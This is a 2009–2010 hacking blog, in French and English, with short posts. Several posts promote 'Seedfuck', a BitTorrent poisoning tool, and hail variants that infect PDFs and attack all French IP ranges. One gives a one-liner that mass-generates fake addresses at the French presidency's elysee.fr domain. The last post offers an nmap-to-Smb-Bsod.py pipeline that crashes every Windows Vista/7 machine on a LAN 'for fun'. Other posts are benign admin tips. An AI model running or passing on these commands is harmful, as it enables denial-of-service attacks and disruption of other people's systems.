mercredi 28 avril 2010

Seedfuck news release French

Un billet en français ne fait pas de mal, surtout au vu de l'ampleur que Seedfuck prend en France en ce momoent.Anéfé, Seedfuck rentre à l'assemblée nationale rien que ca !
Sinon, depuis que le code Python est passé sous licence GPL, il fait son chemin et au galop je dirai, une version seedfuck infecte les pdf, et une release en python optimisé pour attaquer TOUTE les range IP française et quand je dis TOUT ...
c'est ici et ca dechire.

mardi 20 avril 2010

Seedfuck already on Iphone

Hey i see a community around the seedfuck code initially in C#.. This snippet relayed by hack45 and quickly brought in java, php, C + + / Qt, and Python.So i give you a tips to run this apps on your Iphone with Winpwn (Iphone must be Jailbrea):
-Run Cydia Installer and go to Java section and select iPhone/Java
-Install Jikes (java compiler)
Run Terminal (installed above) and use java (jikes) compiler to compiler your program.
For example:
jikes -cp /usr/lib/rt.jar seedfuck.java
For start seedfuck:
java seedufuck

Thx to BurningMace for the code and Vangelis for porting.
Great Hack45 for your hactivism !

mardi 30 mars 2010

Oneliner to generate email

I need email's adress to test a code who parse and grab name to make a dictionnary.
So i found this site : http://www.census.gov/genealogy/www/data/1990surnames/names_files.html
in two subdirectories there is male and female name. :)
Fast and dirty code with curl, cut and sort to grab and insert @asUwant.org
Let's dance :
paste -d "." <(curl http://www.census.gov/genealogy/www/data/1990surnames/dist.female.first http://www.census.gov/genealogy/www/data/1990surnames/dist.male.first | cut -d " " -f 1 | sort -uR) <(curl http://www.census.gov/genealogy/www/data/1990surnames/dist.all.last | cut -d " " -f 1 | sort -R | head -5163) | tr "[:upper:]" "[:lower:]" | sed 's/$/@elysee.fr/g' 
Dload Upload Total Spent Left Speed
100 146k 100 146k 0 0 199k 0 --:--:-- --:--:-- --:--:-- 247k
100 42665 100 42665 0 0 311k 0 --:--:-- --:--:-- --:--:-- 311k
5 3035k 5 169k 0 0 64179 0 0:00:48 0:00:02 0:00:46 67860^C
31 3035k 31 953k 0 0 167k 0 0:00:18 0:00:05 0:00:13 215k


gaye.comish@elysee.fr
darwin.cadriel@elysee.fr
burton.mccloe@elysee.fr
wade.palley@elysee.fr
monnie.deonarine@elysee.fr
kortney.greenough@elysee.fr
lakesha.parsh@elysee.fr
lauren.magierski@elysee.fr
hisako.naidu@elysee.fr
christiane.cooperstein@elysee.fr
terrell.grahe@elysee.fr
wilbert.tolle@elysee.fr
aurelio.motte@elysee.fr
marcellus.isabelle@elysee.fr
garland.lindamood@elysee.fr
wava.nguen@elysee.fr
warren.banerji@elysee.fr
candice.stelman@elysee.fr

vendredi 15 janvier 2010

wget and mms don't work (soluce)

I try to download a wmv from France2 television (stream host akamai), wget warn; unknow stream and stop..
Instead wget use mimms (sudo apt-get install mimms on debian/ubuntu).
http://savannah.nongnu.org/projects/mimms/

Usage same of wget : mimms mms://........./pr0n.wmv.
To get url of video,right click on video (france2),copy, and in term past. enjoy !

dimanche 13 décembre 2009

Netbsd "sshd failed to read the dsa_key..."

Just to notice this, from fresh install netbsd, sshd need 3 key to start. So you use ssh-keygen -t rsa1 and just 2 file are stored in /root/.ssh...not in right directory.
Resolve this problem with this :

> /usr/bin/ssh-keygen -t rsa1 -N "" -f /etc/ssh/ssh_host_key
> /usr/bin/ssh-keygen -t rsa -N "" -f /etc/ssh/ssh_host_rsa_key
> /usr/bin/ssh-keygen -t dsa -N "" -f /etc/ssh/ssh_host_dsa_key

mardi 6 octobre 2009

Just Another a Fucking H0le

Once again ..
http://seclists.org/fulldisclosure/2009/Sep/39
And for fun on your lan :

nmap -p445 $(ifconfig eth0 | head -2 | tail -1 | cut -d: -f2 | cut -d. -f 1,2,3).1-254 | grep -B3 open | grep -o -e '[0-9]\+\.[0-9]\+\.[0-9]\+\.[0-9]\+' | xargs ./ Smb-Bsod.py
 
This cli crash/bsod all windows Vista/seven up on your lan :)